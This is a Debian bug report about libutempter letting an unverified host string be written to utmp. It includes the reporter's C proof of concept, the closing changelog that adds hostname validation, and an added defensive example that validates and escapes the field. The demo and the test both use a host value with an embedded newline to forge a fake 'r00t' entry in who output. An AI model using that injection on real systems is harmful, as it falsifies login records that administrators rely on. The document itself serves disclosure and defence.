
Bug#689562: marked as done (/usr/lib/utempter/utempter: Allows fake host setting)



Your message dated Wed, 02 Oct 2019 17:49:37 +0000
with message-id <E1iFikr-000G7u-Lv@fasolo.debian.org>
and subject line Bug#689562: fixed in libutempter 1.1.6-4
has caused the Debian Bug report #689562,
regarding /usr/lib/utempter/utempter: Allows fake host setting
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)


-- 
689562: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=689562
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems
--- Begin Message ---
Package: libutempter0
Version: 1.1.5-3
Severity: normal
File: /usr/lib/utempter/utempter


Utempter does not (cannot?) verify the setting of host, so it can easily
be faked. This may affect any software that depends on utmp correctness.

Demo of the issue:

psz@bari:~$ cat silly.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>   /* system() */
int main(void)
{
  int i;
  /* Allocate a pty master for the utempter helper to act on. */
  i = open("/dev/ptmx", O_RDWR);
  printf("open ptmx returned %d\n", i);
  /* The helper takes the pty from its stdin, so put the master on fd 0. */
  dup2(i, 0);
  /* dup2(i, 1); */
  printf("doing utempter add\n");
  /* The host argument carries an embedded newline and a made-up who(1) line. */
  system("/usr/lib/utempter/utempter add 'xyz)\nr00t     pts/0        Jan  1 01:02 (xyz.com'");
  printf("checking who\n");
  system("who | grep xyz");
  printf("doing utempter del\n");
  system("/usr/lib/utempter/utempter del");
  printf("checking who\n");
  system("who | grep xyz");
  printf("DONE\n");
  return 0;
}
psz@bari:~$ cc silly.c; a.out
open ptmx returned 3
doing utempter add
checking who
psz      pts/29       Oct  4 11:48 (xyz)
r00t     pts/0        Jan  1 01:02 (xyz.com)
doing utempter del
checking who
DONE
psz@bari:~$ 

Please see also:
http://bugs.debian.org/329156
http://bugs.debian.org/330907

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia


-- System Information:
Debian Release: 6.0.6
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 3.2.19-pk06.01-i386 (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages libutempter0 depends on:
ii  adduser                       3.112+nmu2 add and remove users and groups
ii  libc6                         2.11.3-4   Embedded GNU C Library: Shared lib

libutempter0 recommends no packages.

libutempter0 suggests no packages.

-- no debconf information

--- End Message ---
--- Begin Message ---
Source: libutempter
Source-Version: 1.1.6-4

We believe that the bug you reported is fixed in the latest version of
libutempter, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 689562@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Christian Göttsche <cgzones@googlemail.com> (supplier of updated libutempter package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Mon, 30 Sep 2019 23:37:44 +0200
Source: libutempter
Architecture: source
Version: 1.1.6-4
Distribution: unstable
Urgency: medium
Maintainer: Christian Göttsche <cgzones@googlemail.com>
Changed-By: Christian Göttsche <cgzones@googlemail.com>
Closes: 689562 879388
Changes:
 libutempter (1.1.6-4) unstable; urgency=medium
 .
   * Set myself as new maintainer (Closes: #879388)
   * Update vcs fields accordingly
   * Bump to compat level 12
   * Bump to std version 4.4.1
   * Enable all hardening options in d/rules
   * Add autopkg testsuite
   * Convert d/copyright to machine-readable format
   * Add standard salsa-ci configuration, exclude reprotest for chown failures
   * Remove unneeded ignore file for list-missing
   * Explicit set Build-Depends-Package in d/libutempter0.symbols
   * Explicit set Rules-Requires-Root to binary-targets
   * Add C compiler -Wextra flag in d/rules
   * Patches:
     - Convert to gbp style
     - add: Mark old interfaces as deprecated
     - add: Validate given hostname (Closes: #689562)

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

--- End Message ---
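
The changelog names the fix as "Validate given hostname" but the patch is not shown on this page. The C code below is an added example, not the libutempter patch: it rejects a host string like the one in the report's demo before it is written to utmp, and escapes a stored host field before it is displayed. The allow-list (printable, non-space ASCII), the 256-byte field size, and the names host_is_valid and host_escape are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>
#define HOST_FIELD 256 /* assumed ut_host size (UT_HOSTSIZE on Linux/glibc) */
/* Printable, non-space ASCII only; deliberately locale-independent. */
static int byte_ok(unsigned char c) { return c >= 0x21 && c <= 0x7e; }

/* Writer side: accept a caller-supplied host only if it is non-empty, fits
 * the field, and has no control bytes or whitespace. 1 = accept, 0 = reject. */
int host_is_valid(const char *host)
{
    size_t n = host ? strlen(host) : 0;
    if (n == 0 || n >= HOST_FIELD)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (!byte_ok((unsigned char)host[i]))
            return 0;
    return 1;
}

/* Reader side: render a fixed-size, possibly unterminated host field with each
 * disallowed byte as \xNN. Returns bytes escaped, or -1 if out is too small. */
int host_escape(const char *field, size_t len, char *out, size_t out_sz)
{
    size_t o = 0;
    int escaped = 0;
    if (out_sz == 0) return -1;
    for (size_t i = 0; i < len && field[i] != '\0'; i++) {
        unsigned char c = (unsigned char)field[i];
        size_t need = byte_ok(c) ? 1 : 4;
        if (o + need + 1 > out_sz)
            return -1;
        if (need == 1)
            out[o] = (char)c;
        else
            snprintf(out + o, 5, "\\x%02x", (unsigned)c);
        escaped += (need == 4);
        o += need;
    }
    out[o] = '\0';
    return escaped;
}

int main(void)
{
    const char *h = "xyz)\nr00t     pts/0        Jan  1 01:02 (xyz.com";
    char shown[512]; /* h is the host argument from the report's demo */
    host_escape(h, strlen(h), shown, sizeof shown);
    printf("valid=%d shown=%s\n", host_is_valid(h), shown);
}
```

Both checks constrain only the bytes of the host string. Neither establishes that the named host is where the session really came from, which the report notes utempter may be unable to verify.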
